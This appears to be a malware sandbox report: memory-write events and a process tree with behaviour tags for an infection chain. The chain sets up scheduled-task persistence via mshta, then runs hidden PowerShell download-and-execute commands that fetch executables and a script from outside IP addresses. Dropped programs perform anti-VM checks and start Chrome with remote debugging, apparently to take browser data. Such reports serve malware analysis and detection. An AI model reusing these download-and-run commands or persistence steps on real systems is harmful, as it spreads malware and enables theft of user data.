PID 2120 wrote to memory of 2740	2120	powershell.exe	37
PID 2120 wrote to memory of 2740	2120	powershell.exe	37
PID 2120 wrote to memory of 2740	2120	powershell.exe	37
PID 2120 wrote to memory of 2740	2120	powershell.exe	37
PID 2740 wrote to memory of 840	2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE	38
PID 2740 wrote to memory of 840	2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE	38
PID 2740 wrote to memory of 840	2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE	38
PID 2740 wrote to memory of 840	2740	TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE	38
PID 840 wrote to memory of 2992	840	rapes.exe	40
PID 840 wrote to memory of 2992	840	rapes.exe	40
PID 840 wrote to memory of 2992	840	rapes.exe	40
PID 840 wrote to memory of 2992	840	rapes.exe	40
PID 2992 wrote to memory of 2304	2992	PcAIvJ0.exe	41
PID 2992 wrote to memory of 2304	2992	PcAIvJ0.exe	41
PID 2992 wrote to memory of 2304	2992	PcAIvJ0.exe	41
PID 2304 wrote to memory of 1072	2304	cmd.exe	43
PID 2304 wrote to memory of 1072	2304	cmd.exe	43
PID 2304 wrote to memory of 1072	2304	cmd.exe	43
PID 1072 wrote to memory of 772	1072	powershell.exe	44
PID 1072 wrote to memory of 772	1072	powershell.exe	44
PID 1072 wrote to memory of 772	1072	powershell.exe	44
PID 840 wrote to memory of 1948	840	rapes.exe	46
PID 840 wrote to memory of 1948	840	rapes.exe	46
PID 840 wrote to memory of 1948	840	rapes.exe	46
PID 840 wrote to memory of 1948	840	rapes.exe	46
PID 1948 wrote to memory of 1492	1948	nhDLtPT.exe	47
PID 1948 wrote to memory of 1492	1948	nhDLtPT.exe	47
PID 1948 wrote to memory of 1492	1948	nhDLtPT.exe	47
PID 1948 wrote to memory of 1492	1948	nhDLtPT.exe	47
PID 1492 wrote to memory of 2576	1492	Gxtuum.exe	49
PID 1492 wrote to memory of 2576	1492	Gxtuum.exe	49
PID 1492 wrote to memory of 2576	1492	Gxtuum.exe	49
PID 1492 wrote to memory of 2576	1492	Gxtuum.exe	49
PID 840 wrote to memory of 2000	840	rapes.exe	50
PID 840 wrote to memory of 2000	840	rapes.exe	50
PID 840 wrote to memory of 2000	840	rapes.exe	50
PID 840 wrote to memory of 2000	840	rapes.exe	50
PID 2000 wrote to memory of 2704	2000	ILqcVeT.exe	51
PID 2000 wrote to memory of 2704	2000	ILqcVeT.exe	51
PID 2000 wrote to memory of 2704	2000	ILqcVeT.exe	51
PID 2000 wrote to memory of 2704	2000	ILqcVeT.exe	51
PID 2704 wrote to memory of 2716	2704	chrome.exe	52
PID 2704 wrote to memory of 2716	2704	chrome.exe	52
PID 2704 wrote to memory of 2716	2704	chrome.exe	52
PID 2704 wrote to memory of 2152	2704	chrome.exe	54
PID 2704 wrote to memory of 2152	2704	chrome.exe	54
PID 2704 wrote to memory of 2152	2704	chrome.exe	54
PID 2704 wrote to memory of 1944	2704	chrome.exe	56

C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe
"C:\Users\Admin\AppData\Local\Temp\4a7dab448374270a90b2e15cd12df3f4c9120a4b2508204fa0499a21ea1cac4a.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn 6gRrZmayRUH /tr "mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2248
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\uQGIWnT9Z.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE
      "C:\Users\Admin\AppData\Local\TempWFMHDHKAVHXATJZV2NQNWMVN0IEF4OVU.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2740
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:840
      - C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2992
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9F0.tmp\9F1.tmp\9F2.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:772
      - C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
        7⤵
        Downloads MZ/PE file
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1492
        
        C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
        
        "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2576
      - C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778
        8⤵
        
        PID:2716
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2
        8⤵
        
        PID:1944
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8
        8⤵
        
        PID:2420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:8
        8⤵
        
        PID:448
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2104 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2336 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2344 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1360,i,18057566052343278885,9921208162401892307,131072 /prefetch:2
        8⤵
        
        PID:872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2724
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef68b9758,0x7fef68b9768,0x7fef68b9778
        8⤵
        
        PID:1620
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:2720
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1092 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2
        8⤵
        
        PID:1548
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8
        8⤵
        
        PID:2292
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:8
        8⤵
        
        PID:772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2024 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2504 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1752
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2512 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3544 --field-trial-handle=1344,i,15498433673152258161,11895859552423182892,131072 /prefetch:2
        8⤵
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1712
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
        8⤵
        
        PID:448
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:1116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:2
        8⤵
        
        PID:2788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1528 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8
        8⤵
        
        PID:2884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:8
        8⤵
        
        PID:2972
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2212 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2740 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2756 --field-trial-handle=1248,i,2508522781846531130,13728793299601325557,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1744
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
        8⤵
        
        PID:2628
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        8⤵
        
        PID:1104
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2
        8⤵
        
        PID:2136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
        8⤵
        
        PID:876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1552 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
        8⤵
        
        PID:1248
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1892 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:484
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2604 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1716
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:2428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1384 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:2
        8⤵
        
        PID:1760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 --field-trial-handle=1368,i,3768455966361669316,6836469402976232167,131072 /prefetch:8
        8⤵
        
        PID:2420
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2836
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6159758,0x7fef6159768,0x7fef6159778
        8⤵
        
        PID:448
        
        C:\Windows\system32\ctfmon.exe
        
